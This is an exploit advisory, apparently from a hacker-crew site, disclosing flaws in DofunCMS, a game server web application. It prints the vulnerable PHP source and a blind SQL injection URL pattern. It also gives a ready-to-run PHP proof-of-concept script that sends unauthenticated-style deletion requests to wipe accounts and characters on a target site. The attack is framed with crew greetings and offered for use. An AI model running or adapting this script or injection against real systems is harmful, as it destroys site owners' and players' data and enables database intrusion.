facebook facebook twitter rss

DofunCMS - Multiple Vulnerabilities

Author: The UnKnØwN , Published: 14-01-2013
+-----------------------------------------------------------------------------+
¦ DofunCMS - Multiple Vulnerabilities ¦ _ ¦ - ¦ x ¦
+-----------------------------------------------------------------------------+
¦ ______ ______ _______ _______ _ _ ¦
¦ (_____ \(_____ (_______) (_______) | | (_) _ ¦
¦ _____) )_____) ) ___ -- _____ _ _ ____ | | ___ _ _| |_ ¦
¦ | __ /| ____/ | (_ | | ___) ( \ / ) _ \| |/ _ \| (_ _) ¦
¦ | | \ \| | | |___) | | |_____ ) x (| |_| | | |_| | | | |_ ¦
¦ |_| |_|_| \_____/ |_______|_/ \_) __/ \_)___/|_| \__).com ¦
+-----------------------------------------------------------------------------+
¦ by The UnKnØwN ¦
+-----------------------------------------------------------------------------+
¦ greets to : KiMgX12 - Fawzi Coldfire - Kalashinkov3 - Caddy-Dz - Ked'Ans-Dz ¦
¦ BenzØ - Soka - Hony - Pincki - Linkce16 - Mooh Splinter ¦
¦ The Spark - F3i - w0dm4n ¦
¦ The Crazy3D Team AND all algerian H4x0r$ ¦
+-----------------------------------------------------------------------------+
¦ [+] exploit title : [Dofus] DofunCMS - Multiple Vulnerabilities ¦
¦ [+] date : 12-01-2013 ¦
¦ [+] author : The UnKnØwN ¦
¦ [+] home : http://www.rpg-exploit.com/ ¦
¦ [+] version : all ¦
¦ [+] category : webapps ¦
¦ [+] tested on : Windows 7, Apache/2.2.22 (Win32) PHP/5.4.3 ¦
+-----------------------------------------------------------------------------+
¦ Vulnerability Details ¦
+-----------------------------------------------------------------------------+
¦ ¦
1) Blind SQL Injection (You need to be logged in)
Unprotected GET variable in "/pages/acheter.php"

$error = FALSE;
if (!$connect) $error = 1; // test si connecté
if (!$error) // Test si l'objet existe
{
$rep = mysql_fetch_array(mysql_query("SELECT ID FROM boutique_objets WHERE ID='".$_GET['objet']."'"));
if (!isset($rep[0])) $error = 2;
}


Exploit :


http://site/path/index.php?p=acheter&objet={Inject}


2) Accounts/Characters Delete (You need to be logged in):
Unprotected functions in /pages/perso.php

if(isset($_GET['delp']))
{
$_GET['delp'] = secu($_GET['delp']);
$nomPerso = nomPerso($_GET['delp']);
if(deletePerso($_GET['delp']))
{
$done = TRUE;
$doneMSG = 'Le personnage "'.$nomPerso.'" à été supprimé correctement';
}
else
{
$done = FALSE;
$doneMSG = "Le personnage n'a pu être supprimé";
}
}

if(isset($_GET['dela']))
{
$_GET['dela'] = secu($_GET['dela']);

$nomAccount = nomAccount($_GET['dela']);
if(deleteAccount($_GET['dela']))
{
$done = TRUE;
$doneMSG = 'Le compte "'.$nomAccount.'" et tout ses personnages ont été supprimé correctement';
}
else
{
$done = FALSE;
$doneMSG = "Le compte n'a pu être supprimé";
}
}



PoC :

<?php
/*
!dofun_delete
@ HOST = localhost = Target URL
@ PORT = 80 = Target PORT
@ PATH = / = Web site path
*/
error_reporting(0);
set_time_limit(0);
$host $argv[1];
$port $argv[2];
$path $argv[3];
print 
"\n+-----------------------[ The Crazy3D Team ]--------------------------+";
print 
"\n| Dofun Accounts/Characters Delete                                    |";
print 
"\n|                                by The UnKn0wN                       |";
print 
"\n|     Greets to : The Crazy3D's members and all Algerian h4x0rs       |";
print 
"\n+---------------------------------------------------------------------+";
print 
"\n|                         www.RPG-Exploit.com                         |";
print 
"\n+---------------------------------------------------------------------+\n";
print 
"Deleting accounts ...";
file_get_contents("http://".$host."".$path."index.php?p=perso&dela=1%20or%202%20or%203"); 
print
"Done ! \n";
sleep(1);
print 
"Deleting characters ...";
file_get_contents("http://".$host."".$path."index.php?p=perso&delp=1%20or%202%20or%203"); 
print
"Done ! \n Exploit Finished Check by your self!\n";
?>



¦ ¦
+-----------------------------------------------------------------------------+
¦ End ¦
+-----------------------------------------------------------------------------+

Like us on Facebook :